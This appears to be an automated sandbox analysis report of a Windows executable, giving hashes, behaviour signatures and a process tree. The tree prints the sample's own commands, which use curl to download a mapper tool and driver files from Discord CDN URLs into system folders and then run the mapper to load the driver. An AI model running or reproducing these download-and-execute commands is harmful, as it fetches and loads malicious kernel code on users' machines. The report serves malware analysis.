9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c

General

Target

9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe
Size

5.3MB
MD5

6194ffd6e8c888145a9ffc3bb69b0b55
SHA1

531e8103d924ec7f19d556e96f420a3f63d6a77b
SHA256

9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c
SHA512

abf73145492cc3ad0a422535dede9eb5d616beb9edc590de7ed7d1a3768068e0aeb2433f98085b06fd9d606024b4e7c91987009b58aa2b7f0561045c8839cade
SSDEEP

98304:Gdru8uev2g3IPDNSZIolNh/yJydF06XeDBVeCZUinzInJ5+bkrKx1B3NWiOxH:GFGIWb8ZIeNTdF06KBVeQUT+bO61BdWF

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\warehub.sys	curl.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\IME\mapper.sys	curl.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe
2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2280 wrote to memory of 3268	2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe	87
PID 2280 wrote to memory of 3268	2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe	87
PID 3268 wrote to memory of 2420	3268	cmd.exe	88
PID 3268 wrote to memory of 2420	3268	cmd.exe	88
PID 2280 wrote to memory of 4040	2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe	91
PID 2280 wrote to memory of 4040	2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe	91
PID 4040 wrote to memory of 2796	4040	cmd.exe	92
PID 4040 wrote to memory of 2796	4040	cmd.exe	92
PID 2280 wrote to memory of 3412	2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe	93
PID 2280 wrote to memory of 3412	2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe	93
PID 3412 wrote to memory of 5028	3412	cmd.exe	94
PID 3412 wrote to memory of 5028	3412	cmd.exe	94
PID 2280 wrote to memory of 4072	2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe	95
PID 2280 wrote to memory of 4072	2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe	95
PID 4072 wrote to memory of 1448	4072	cmd.exe	96
PID 4072 wrote to memory of 1448	4072	cmd.exe	96
PID 2280 wrote to memory of 1868	2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe	97
PID 2280 wrote to memory of 1868	2280	9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe	97

C:\Users\Admin\AppData\Local\Temp\9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe
"C:\Users\Admin\AppData\Local\Temp\9f131b4fcec7c0e30a9e529447833e41e3fe814d429b5544f3b662f5205f364c.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1145811432676536420/1146174457786925167/SinMapper.exe -o C:\Windows\IME\SinMapper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3268
- - C:\Windows\system32\curl.exe
    curl https://cdn.discordapp.com/attachments/1145811432676536420/1146174457786925167/SinMapper.exe -o C:\Windows\IME\SinMapper.exe
    3⤵
    PID:2420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1145811432676536420/1146174740302680204/mapper.sys -o C:\Windows\IME\mapper.sys
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4040
- - C:\Windows\system32\curl.exe
    curl https://cdn.discordapp.com/attachments/1145811432676536420/1146174740302680204/mapper.sys -o C:\Windows\IME\mapper.sys
    3⤵
    - Drops file in Windows directory
    PID:2796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1145811432676536420/1146175240288882698/mlx4_bus.sys --silent -o C:\Windows\System32\drivers\warehub.sys
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3412
- - C:\Windows\system32\curl.exe
    curl https://cdn.discordapp.com/attachments/1145811432676536420/1146175240288882698/mlx4_bus.sys --silent -o C:\Windows\System32\drivers\warehub.sys
    3⤵
    - Drops file in Drivers directory
    PID:5028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /C C:\Windows\IME\SinMapper.exe C:\Windows\IME\mapper.sys warehub.sys .data
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /C C:\Windows\IME\SinMapper.exe C:\Windows\IME\mapper.sys warehub.sys .data
    3⤵
    PID:1448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1868

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\IME\mapper.sys

Filesize
17KB

MD5
87a999455359fbee0c59bf73ec9b08b4

SHA1
9c1321f80faf68e6b1772b744f1a4d68cbe73fc0

SHA256
3a40b93a70a38b3d2fd4eed15207a00a96fcf3a24aa6a8caaa354822546862d2

SHA512
eee11af6473ef17a2f9874c91a09cfd8e3bbe70bd3827c41c48616b2f577ab56ecc64c4925cdb64468d41bc9a79755aa971f33ccff4c6883d14d50b649c0b69f

Download Submit
memory/2280-0-0x00007FF6DFC50000-0x00007FF6E052F000-memory.dmp

Filesize
8.9MB

Download
memory/2280-2-0x00007FFA8F210000-0x00007FFA8F212000-memory.dmp

Filesize
8KB

Download
memory/2280-3-0x00007FFA8F220000-0x00007FFA8F222000-memory.dmp

Filesize
8KB

Download
memory/2280-4-0x00007FF6DFC50000-0x00007FF6E052F000-memory.dmp

Filesize
8.9MB

Download
memory/2280-6-0x000001A578FB0000-0x000001A578FB1000-memory.dmp

Filesize
4KB

Download
memory/2280-7-0x000001A578FC0000-0x000001A578FC1000-memory.dmp

Filesize
4KB

Download
memory/2280-8-0x000001A578FD0000-0x000001A578FD1000-memory.dmp

Filesize
4KB

Download
memory/2280-9-0x000001A578FF0000-0x000001A578FF1000-memory.dmp

Filesize
4KB

Download
memory/2280-10-0x00007FF6DFC50000-0x00007FF6E052F000-memory.dmp

Filesize
8.9MB

Download

Analysis

Sharing